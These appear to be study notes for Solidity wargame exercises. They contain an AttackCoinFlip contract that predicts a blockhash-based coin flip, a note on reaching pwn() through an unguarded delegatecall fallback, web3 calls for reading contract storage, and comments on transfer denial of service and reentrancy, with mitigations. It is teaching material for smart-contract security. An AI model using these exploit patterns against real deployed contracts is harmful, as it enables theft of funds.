contract.address
pragma solidity ^0.8.0;
import "./4.CoinFlip.sol";
/// @title AttackCoinFlip
/// @notice Exercise contract showing that a coin flip derived from `blockhash`
///         is not random: any contract executing in the same block reads the
///         same block hash and can therefore compute the same outcome.
/// @dev Defensive takeaway for the contract being tested: do not derive
///      randomness from on-chain block data (block hash, timestamp, number).
///      Use a commit-reveal scheme or a verifiable randomness oracle instead.
contract AttackCoinFlip {
    /// @notice Handle to the already-deployed CoinFlip instance.
    CoinFlip public rawCoinFlip;

    // 2**255: integer-dividing a uint256 by this value yields 0 or 1 (its top bit).
    uint256 FACTOR =
        57896044618658097711785492504343953926634992332820282019728792003956564819968;

    /// @param _rawCoinFlipAddress Address at which the CoinFlip contract is deployed.
    constructor(address _rawCoinFlipAddress) {
        rawCoinFlip = CoinFlip(_rawCoinFlipAddress);
    }

    /// @notice Derives a boolean from the previous block's hash and forwards it
    ///         to `CoinFlip.flip`.
    /// @dev Presumably this mirrors the derivation inside CoinFlip itself; the
    ///      imported source is not shown here, so confirm against it.
    function flip() public {
        // The hash of the previous block is visible to every transaction in this block.
        uint256 previousBlockHash = uint256(blockhash(block.number - 1));
        uint256 topBit = previousBlockHash / FACTOR;
        bool guess = (topBit == 1);
        rawCoinFlip.flip(guess);
    }
}
`rawCoinFlip = CoinFlip(_rawCoinFlipAddress);`:`_rawCoinFlipAddress` 是合约已经部署的地址。
`tx.origin`:交易发起源(最初发起交易的外部账户)。不要用它做权限校验,应使用 `msg.sender`;参见 Tx Origin Attacks。
使用代理(delegatecall)的方式把其他合约的逻辑使用在自己合约中。被调用的逻辑在本合约的存储上下文中执行,因此可以修改本合约的状态变量。
// Catch-all entry point: forwards the raw calldata to `delegate` via delegatecall.
//
// SECURITY NOTE: delegatecall runs the target's code against THIS contract's
// storage and keeps the original msg.sender. Because msg.data is fully
// caller-controlled and there is no access check or selector allow-list here,
// any caller can invoke any function of `delegate` and have it write to this
// contract's state variables. Mitigations: restrict who may reach this path,
// allow-list the selectors that may be forwarded, and keep the storage layouts
// of both contracts deliberately aligned.
fallback() external {
    (bool ok, ) = address(delegate).delegatecall(msg.data);
    // A failed delegatecall is ignored: no revert and no error is surfaced.
    if (!ok) {
        return;
    }
    this; // no-op expression statement kept from the original
}
`msg.data` 是 method id(函数选择器),通过 `web3.utils.sha3('pwn()')` 获取。
web3.utils.toAscii(hexString)
web3.utils.toHex(string)
web3.eth.getStorageAt(contractAddress, position)
// Sends msg.value wei to `king`. transfer() forwards only a 2300-gas stipend and
// reverts if the recipient cannot accept the payment, so a recipient contract
// that rejects ETH makes the whole enclosing call revert (denial of service).
// Prefer a pull-payment (withdraw) pattern when the recipient is untrusted.
payable(king).transfer(msg.value); // send ETH to the king account
// Sends `balance` wei to msg.sender with a low-level call. call() returns false
// instead of reverting, so `sent` must be checked. It also forwards all remaining
// gas, which lets a recipient contract re-enter: update balances before this
// line (checks-effects-interactions) or use a reentrancy guard.
(bool sent, ) = msg.sender.call{value: balance}(""); // send ETH to msg.sender
Fallback function
合约被调用但没有匹配到任何函数时会执行的回调函数。
当通过 `send`、`sendTransaction`、`transfer` 向合约转账时也会触发。